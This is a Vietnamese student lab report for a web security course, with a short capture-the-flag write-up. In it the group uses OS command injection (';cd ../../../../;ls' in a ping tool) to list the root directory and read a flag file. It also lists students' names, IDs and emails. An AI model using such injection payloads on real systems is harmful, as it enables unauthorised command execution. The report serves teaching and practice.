



# BÁO CÁO BÀI TẬP TRÊN LỚP

Môn học: Bảo mật Web và Ứng dụng

Nhóm: 07

1. **THÔNG TIN CHUNG:**  
(Liệt kê tất cả các thành viên trong nhóm)  
Lớp: NT213.O22.ATCL.2

STT	Họ và tên	MSSV	Email
1	Hồ Ngọc Thiện	21522620	<a href="mailto:21522620@gm.uit.edu.vn">21522620@gm.uit.edu.vn</a>
2	Dương Phú Cường	21521900	21521900@gm.uit.edu.vn
3	Cao Minh Đức	21520726	21520726@gm.uit.edu.vn
4	Đặng Quang Huy	21520256	21520256@gm.uit.edu.vn

2. **NỘI DUNG THỰC HIỆN:<sup>1</sup>**

STT	Công việc	Kết quả tự đánh giá
1	Kịch bản 01	100%
2	Kịch bản 02	100%
3	Kịch bản 03	100%
4	Kịch bản 04	100%
5	Kịch bản 05	100%
6	Kịch bản 06	100%
7	Kịch bản 07	100%

Phần bên dưới của báo cáo này là tài liệu báo cáo chi tiết của nhóm thực hiện.

<sup>1</sup> Ghi nội dung công việc, các kịch bản trong bài Thực hành

## BÁO CÁO CHI TIẾT

### whois tool 2.0

ping

PING google.com (142.251.12.102): 56 data bytes

Ta thấy có lệnh ping ở đây, ta có thể sử dụng OS command injection để khai thác

### whois tool 2.0

ping

```
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.357 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.392 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.347 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.388 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.299 ms
64 bytes from 127.0.0.1: icmp_seq=5 ttl=64 time=0.312 ms
64 bytes from 127.0.0.1: icmp_seq=6 ttl=64 time=0.342 ms
64 bytes from 127.0.0.1: icmp_seq=7 ttl=64 time=0.386 ms
64 bytes from 127.0.0.1: icmp_seq=8 ttl=64 time=0.299 ms
64 bytes from 127.0.0.1: icmp_seq=9 ttl=64 time=0.387 ms
index.php
```

Sử dụng lệnh `;cd ../../../../;ls` ta thấy được tập tin flag như sau

## Session 02: Tổng quan các lỗ hổng bảo mật web

# whois tool 2.0

```
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
secret6247e5b75faf56be729e.txt
srv
sys
tmp
usr
var
```

Cat ra và ta thu được flag

```
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
secret6247e5b75faf56be729e.txt
srv
sys
tmp
usr
var
flag{bLind_os_command_injecTion}
```

Flag thu được: flag{bLind\_os\_command\_injecTion}

---

*Sinh viên đọc kỹ yêu cầu trình bày bên dưới trang này*

## YÊU CẦU CHUNG

- Sinh viên tìm hiểu và thực hành theo hướng dẫn.
- Nộp báo cáo kết quả chi tiết những việc (**Report**) bạn đã thực hiện, quan sát thấy và kèm ảnh chụp màn hình kết quả (nếu có); giải thích cho quan sát (nếu có).
- Sinh viên báo cáo kết quả thực hiện và nộp bài.

### Báo cáo:

- File **.DOCX và .PDF**. Tập trung vào nội dung, không mô tả lý thuyết.
- Nội dung trình bày bằng **Font chữ Times New Romans/ hoặc font chữ của mẫu báo cáo này (UTM Neo Sans Intel/UTM Viet Sach)– cỡ chữ 13. Canh đều (Justify) cho văn bản. Canh giữa (Center) cho ảnh chụp.**
- Đặt tên theo định dạng: [Mã lớp]-SessionX\_GroupY. (trong đó X là Thứ tự buổi Thực hành, Y là số thứ tự Nhóm Thực hành đã đăng ký với GVHD-TH).  
*Ví dụ: [NT101.K11.ATCL]-Session1\_Group3.*
- Nếu báo cáo có nhiều file, nén tất cả file vào file .ZIP với cùng tên file báo cáo.
- **Không đặt tên đúng định dạng – yêu cầu, sẽ KHÔNG chấm điểm bài Lab.**
- Nộp file báo cáo trên theo thời gian đã thống nhất tại courses.uit.edu.vn.

**Đánh giá:** Sinh viên hiểu và tự thực hiện được bài thực hành. Khuyến khích:

- Chuẩn bị tốt.
- Có nội dung mở rộng, ứng dụng trong kịch bản phức tạp hơn, có đóng góp xây dựng bài thực hành.

*Bài sao chép, trộm, ... sẽ được xử lý tùy mức độ vi phạm.*

**HẾT**